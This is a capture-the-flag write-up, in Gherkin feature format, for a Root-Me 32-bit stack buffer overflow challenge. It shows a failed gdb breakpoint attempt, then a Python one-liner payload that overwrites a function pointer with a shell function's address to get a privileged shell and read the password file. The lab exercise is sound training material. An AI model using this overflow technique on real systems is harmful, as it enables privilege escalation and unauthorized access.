## Version 2.0
## language: en

Feature:
  Site:
    www.root-me.org
  Category:
    BoF
  User:
    bianfa
  Goal:
    Get the password from .passwd file

  Background:
  Hacker's software:
    | <Software name> | <Version>     |
    | Kali Linux      | 2020.3        |
    | Firefox         | 68.10.0esr    |
    | SSH             | OpenSSH_8.3p1 |
  Machine information:
    Given the challenge URL
    """
    https://www.root-me.org/en/Challenges/App-System/ELF32-Stack-buffer-
    overflow-basic-2
    """
    When I open this URL with Firefox
    Then I see some credentials to access a machine via SSH
    And I enter by console in Kali with the credentials
    Then I see some info
    """
    ----------------

    Welcome on challenge02    /

    -----------------------------

    /tmp and /var/tmp are writeable
    ----------------
    """
    And I run "ls -a"
    Then I see the following four files
    """
    .passwd  Makefile  ch15  ch15.c
    """

  Scenario: Fail:Attempt use breakpoints with gdb
    Given the code from 'ch15.c' that can be seen in [evidence](bianfa.c)
    When I run "cat ~/ch15.c"
    Then I see that I can overwrite the "func" pointer value by buffer overflow
    And I get a shell with root privileges
    And I try to change the "func" value to method direction "shell"
    And I run "gdb ~/ch15" to debug the program
    When I run "run < <(python -c "print 'A'*128+'BBBB'")"
    Then I try to fill the variable "buf" with 128 bytes of A
    And I try to overwrite the pointer "func" with 4 bytes of B
    And I get a segmentation error for the address "0x42424242"
    Then I run "info registers" for see the values of the registers
    And this it can be seen in [evidence](img1.png)
    Then I get the "eax" value in ASCII code "42424242"
    And I can conclude that the "eax" value is the "func" pointer value
    And the program stops looking for the instruction in the address "42424242"
    When I try to find the method direction "shell" using breakpoint in gdb
    Then I get a problem for use breakpoints
    And this it can be seen in [evidence](img2.png)

  Scenario: Success:Use disassemble with gdb
    Given the code from 'ch15.c' that can be seen in [evidence](bianfa.c)
    When I run "cat ~/ch15.c"
    Then I see that I can overwrite the "func" pointer value by buffer overflow
    And I try to change the "func" value to method direction "shell"
    Then I run "gdb ~/ch15" to debug the program
    And I run "disass shell" to list the instructions for this method
    And this it can be seen in [evidence](img3.png)
    And I get the address of first instruction to overwrite in "func"
    Then I close gdb running "quit"
    When I run "cat <(python -c "print 'A'*128+'\x16\x85\x04\x08'") - | ./ch15"
    Then I try to fill the variable "buf" with 128 bytes of A
    And I try to overwrite the pointer "func" with the address of "shell"
    Then I get a shell open with root privileges
    And I run "cat .passwd"
    And I get the flag as can be seen in [evidence](img4.png)
    """
    cat .passwd
    <flag>
    """
